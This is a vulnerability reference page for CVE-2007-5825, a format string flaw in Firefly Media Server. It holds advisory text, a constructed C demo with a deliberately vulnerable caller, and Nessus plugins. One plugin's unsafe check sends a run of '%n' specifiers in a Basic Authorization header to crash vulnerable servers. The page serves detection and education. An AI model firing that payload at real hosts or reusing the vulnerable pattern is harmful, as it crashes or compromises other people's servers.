CVE-2007-5825 - Use of Externally-Controlled Format String vulnerability in Firefly Media Server 0.2.4
Attack vector: UNKNOWN
Attack complexity: UNKNOWN
Privileges required: UNKNOWN
Confidentiality impact: UNKNOWN
Integrity impact: UNKNOWN
Availability impact: UNKNOWN
Summary
Format string vulnerability in the ws_addarg function in webserver.c in mt-daapd in Firefly Media Server 0.2.4 and earlier allows remote attackers to execute arbitrary code via a stats method request to /xml-rpc (/xml-rpc?method=stats) with format string specifiers in the (1) username or (2) password portion of the base64-encoded data on the "Authorization: Basic" HTTP header line.
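The header-to-format-string path described in the summary, as an added example that is not Firefly's code: a printf-style ws_addarg() stand-in (its signature and the WS_ARG structure are assumptions; only the vsnprintf() call in src/webserver.c is on the page), a vulnerable caller that passes the decoded username as the format beside the fixed caller that uses a constant "%s" format, and a Basic-credential parser that rejects the empty header and missing ':' inputs the Gentoo advisory entry on this page attributes to CVE-2007-5824. The base64 decoder and the sample credentials are constructed for the example; the "%%" probe shows that the credential is interpreted as a format without the undefined behaviour a "%n" would cause.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical argument slot standing in for whatever Firefly's ws_addarg()
 * fills; the real structure is not on the page. */
typedef struct {
    char key[64];
    char value[256];
} WS_ARG;

/* printf-like helper in the shape the page describes for ws_addarg(): the
 * third parameter goes straight to vsnprintf() as the format. Assumed
 * signature, not the project's own code. */
static int ws_addarg(WS_ARG *arg, const char *key, const char *fmt, ...)
{
    va_list ap;
    int n;

    snprintf(arg->key, sizeof arg->key, "%s", key);
    va_start(ap, fmt);
    n = vsnprintf(arg->value, sizeof arg->value, fmt, ap);
    va_end(ap);
    return n;
}

/* VULNERABLE (CVE-2007-5825 pattern): the decoded username *is* the format,
 * so any %-specifier in the credential is interpreted by vsnprintf(). */
static int store_user_vulnerable(WS_ARG *arg, const char *user)
{
    return ws_addarg(arg, "HTTP_USERNAME", user);
}

/* FIXED: constant format string, user data passed as an argument. */
static int store_user_fixed(WS_ARG *arg, const char *user)
{
    return ws_addarg(arg, "HTTP_USERNAME", "%s", user);
}

/* Minimal base64 decoder, constructed for this example. Stops at '=' padding,
 * rejects characters outside the alphabet, always NUL-terminates. Returns the
 * number of bytes decoded or -1 on malformed input or insufficient space. */
static int b64_val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

static int b64_decode(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    unsigned int acc = 0;
    int bits = 0;

    for (; *in && *in != '='; in++) {
        int v = b64_val((unsigned char)*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n + 1 >= outlen) return -1;      /* keep room for the NUL */
            out[n++] = (char)((acc >> bits) & 0xff);
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Parses an "Authorization: Basic <b64>" header value into user and password.
 * Returns 0 on success, -1 for a non-Basic scheme, an empty credential, bad
 * base64, a missing ':' separator, or a field too long for its buffer. The
 * empty and no-colon cases are the CVE-2007-5824 inputs from the GLSA text. */
static int parse_basic_auth(const char *value, char *user, size_t ulen,
                            char *pass, size_t plen)
{
    char decoded[512];
    const char *colon;
    size_t n;

    if (!value || strncmp(value, "Basic ", 6) != 0) return -1;
    value += 6;
    while (*value == ' ') value++;
    if (*value == '\0') return -1;               /* "Basic" with no credential */
    if (b64_decode(value, decoded, sizeof decoded) < 0) return -1;
    colon = strchr(decoded, ':');
    if (!colon) return -1;                       /* no user:password separator */
    n = (size_t)(colon - decoded);
    if (n >= ulen || strlen(colon + 1) >= plen) return -1;
    memcpy(user, decoded, n);
    user[n] = '\0';
    strcpy(pass, colon + 1);
    return 0;
}

int main(void)
{
    WS_ARG arg;
    char user[64], pass[64];

    /* Constructed credential "ad%%min:x", base64 "YWQlJW1pbjp4". */
    if (parse_basic_auth("Basic YWQlJW1pbjp4", user, sizeof user, pass, sizeof pass) == 0) {
        store_user_vulnerable(&arg, user);
        printf("vulnerable: %s\n", arg.value);  /* "ad%min": %% was interpreted */
        store_user_fixed(&arg, user);
        printf("fixed:      %s\n", arg.value);  /* "ad%%min": stored verbatim */
    }
    printf("empty credential -> %d\n", parse_basic_auth("Basic ", user, sizeof user, pass, sizeof pass));
    printf("no ':' separator -> %d\n", parse_basic_auth("Basic YWRtaW4=", user, sizeof user, pass, sizeof pass));
    return 0;
}
```

Annotating the real ws_addarg() with __attribute__((format(printf, 3, 4))) would let gcc's -Wformat-security flag the vulnerable caller at compile time; the attribute is deliberately left off here so the vulnerable variant still builds for the demonstration.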
Vulnerable Configurations
Part | Description | Count
---|---|---
Application | | 1
Common Weakness Enumeration (CWE)
- CWE-134: Use of Externally-Controlled Format String
Common Attack Pattern Enumeration and Classification (CAPEC)
- Format String Injection: An attacker includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting characters. For example, in certain functions of the C programming language such as printf, the conversion specifier %s prints the contents of a memory location, expecting the corresponding argument to point to a string, and %n writes the number of bytes output so far to the memory location given by the corresponding argument. An attacker can use this to read or write memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes, and writing memory could result in the execution of arbitrary code if the attacker can overwrite a return address or other control data on the stack.
- String Format Overflow in syslog(): This attack targets format string vulnerabilities in the syslog() function. An attacker would typically inject malicious input into the format string parameter of the syslog() call. This is a common problem, and many public vulnerabilities and associated exploits have been posted.
Nessus
NASL family: Gain a shell remotely
NASL id: FIREFLY_FORMAT_STRING.NASL
description: The remote host is running Firefly Media Server, also known as mt-daapd, a media streaming server. The version of Firefly Media Server installed on the remote host apparently fails to sanitize user-supplied input before using it as the format string in a call to 'vsnprintf' in 'src/webserver.c'.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 27619
published: 2007-11-03
reporter: This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/27619
title: Firefly Media Server webserver.c ws_addarg Function /xml-rpc Authorization Header Remote Format String
code:
```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(27619);
  script_version("1.21");

  script_cve_id("CVE-2007-5825");
  script_bugtraq_id(26310);

  script_name(english:"Firefly Media Server webserver.c ws_addarg Function /xml-rpc Authorization Header Remote Format String");
  script_summary(english:"Sends a specially crafted Authorization request header");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a format string vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running Firefly Media Server, also known as mt-daapd,
a media streaming server.

The version of Firefly Media Server installed on the remote host
apparently fails to sanitize user-supplied input before using it as the
format string in a call to 'vsnprintf' in 'src/webserver.c'.  Using a
specially crafted HTTP Authorization request header, an
unauthenticated, remote attacker can leverage this issue to crash the
affected service or to execute arbitrary code on the affected system,
subject to the privileges under which the service operates." );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/483209/30/0/threaded" );
  # http://sourceforge.net/project/shownotes.php?release_id=548679&group_id=98211
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bd56a4e9" );
  script_set_attribute(attribute:"solution", value:
"Either disable the service or upgrade to Firefly Media Server 0.2.4.1 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_cwe_id(134);

  script_set_attribute(attribute:"plugin_publication_date", value: "2007/11/03");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:firefly:media_server");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 3689);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:3689, embedded: 1);

# Make sure it looks like Firefly / mt-daapd.
banner = get_http_banner(port:port);
if (!banner || "mt-daapd/" >!< banner) exit(0);

# Try to exploit the issue.
if (safe_checks())
{
  # A bare "Basic" header (no credential) is enough to provoke the
  # "Invalid argument" error on an unpatched server without crashing it.
  auth2 = "Basic";
}
else
{
  if (report_paranoia < 2) exit(0);

  # Unsafe check: a run of %n specifiers in the username portion, which
  # makes a vulnerable ws_addarg() write through the stack and crash.
  exploit = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
  auth2 = string("Basic ", base64(str:exploit+":"+SCRIPT_NAME));
}

url = "/xml-rpc?method=stats";
w = http_send_recv3(method:"GET", item:url, port:port, add_headers: make_array("Authorization", auth2));
if (isnull(w)) res = NULL;
else res = strcat(w[0], w[1], '\r\n', w[2]);

# If safe checks are enabled...
if (safe_checks())
{
  # there's a problem if we see a response with an invalid argument error.
  if (!isnull(res) && "<br>Error: Invalid argument" >< res) security_hole(port);
}
# Otherwise...
else
{
  # There's a problem if the server is down.
  w = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(w)) security_hole(port);
}
```
NASL family: Gentoo Local Security Checks
NASL id: GENTOO_GLSA-200712-18.NASL
description: The remote host is affected by the vulnerability described in GLSA-200712-18 (Multi-Threaded DAAP Daemon: Multiple vulnerabilities). nnp discovered multiple vulnerabilities in the XML-RPC handler in the file webserver.c. The ws_addarg() function contains a format string vulnerability, as it does not properly sanitize username and password data from the 'Authorization: Basic' HTTP header line (CVE-2007-5825). The ws_decodepassword() and ws_getheaders() functions do not correctly handle empty Authorization header lines, or header lines without a ':' character, leading to NULL pointer dereferences (CVE-2007-5824).
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 29815
published: 2007-12-31
reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/29815
title: GLSA-200712-18 : Multi-Threaded DAAP Daemon: Multiple vulnerabilities
code:
```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200712-18.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include("compat.inc");

if (description)
{
  script_id(29815);
  script_version("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:44");

  script_cve_id("CVE-2007-5824", "CVE-2007-5825");
  script_bugtraq_id(26310);
  script_xref(name:"GLSA", value:"200712-18");

  script_name(english:"GLSA-200712-18 : Multi-Threaded DAAP Daemon: Multiple vulnerabilities");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote Gentoo host is missing one or more security-related
patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is affected by the vulnerability described in GLSA-200712-18
(Multi-Threaded DAAP Daemon: Multiple vulnerabilities)

    nnp discovered multiple vulnerabilities in the XML-RPC handler in
    the file webserver.c. The ws_addarg() function contains a format
    string vulnerability, as it does not properly sanitize username and
    password data from the 'Authorization: Basic' HTTP header line
    (CVE-2007-5825). The ws_decodepassword() and ws_getheaders()
    functions do not correctly handle empty Authorization header lines,
    or header lines without a ':' character, leading to NULL pointer
    dereferences (CVE-2007-5824).

Impact :

    A remote attacker could send specially crafted HTTP requests to the
    web server in the Multi-Threaded DAAP Daemon, possibly leading to
    the execution of arbitrary code with the privileges of the user
    running the web server or a Denial of Service.

Workaround :

    There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/200712-18"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"All Multi-Threaded DAAP Daemon users should upgrade to the latest
version:

    # emerge --sync
    # emerge --ask --oneshot --verbose '>=media-sound/mt-daapd-0.2.4.1'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_cwe_id(20, 134);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mt-daapd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/12/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/31");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

flag = 0;

# Anything older than 0.2.4.1 carries both CVE-2007-5824 and CVE-2007-5825.
if (qpkg_check(package:"media-sound/mt-daapd", unaffected:make_list("ge 0.2.4.1"), vulnerable:make_list("lt 0.2.4.1"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Multi-Threaded DAAP Daemon");
}
```
NASL family: Debian Local Security Checks
NASL id: DEBIAN_DSA-1597.NASL
description: Three vulnerabilities have been discovered in the mt-daapd DAAP audio server (also known as the Firefly Media Server). The Common Vulnerabilities and Exposures project identifies the following three problems:
- CVE-2007-5824: Insufficient validation and bounds checking of the Authorization: HTTP header enables a heap buffer overflow, potentially enabling the execution of arbitrary code.
- CVE-2007-5825: Format string vulnerabilities in debug logging within the authentication of XML-RPC requests could enable the execution of arbitrary code.
- CVE-2008-1771: An integer overflow weakness in the handling of HTTP POST variables could allow a heap buffer overflow and potentially arbitrary code execution.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 33178
published: 2008-06-16
reporter: This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/33178
title: Debian DSA-1597-2 : mt-daapd - multiple vulnerabilities
References
- http://bugs.gentoo.org/show_bug.cgi?id=200110
- http://secunia.com/advisories/28269
- http://secunia.com/advisories/30661
- http://sourceforge.net/project/shownotes.php?group_id=98211&release_id=548679
- http://www.debian.org/security/2008/dsa-1597
- http://www.gentoo.org/security/en/glsa/glsa-200712-18.xml
- http://www.securityfocus.com/archive/1/483209/100/0/threaded
- http://www.securityfocus.com/archive/1/483214/100/0/threaded
- http://www.securityfocus.com/bid/26310
- https://exchange.xforce.ibmcloud.com/vulnerabilities/38243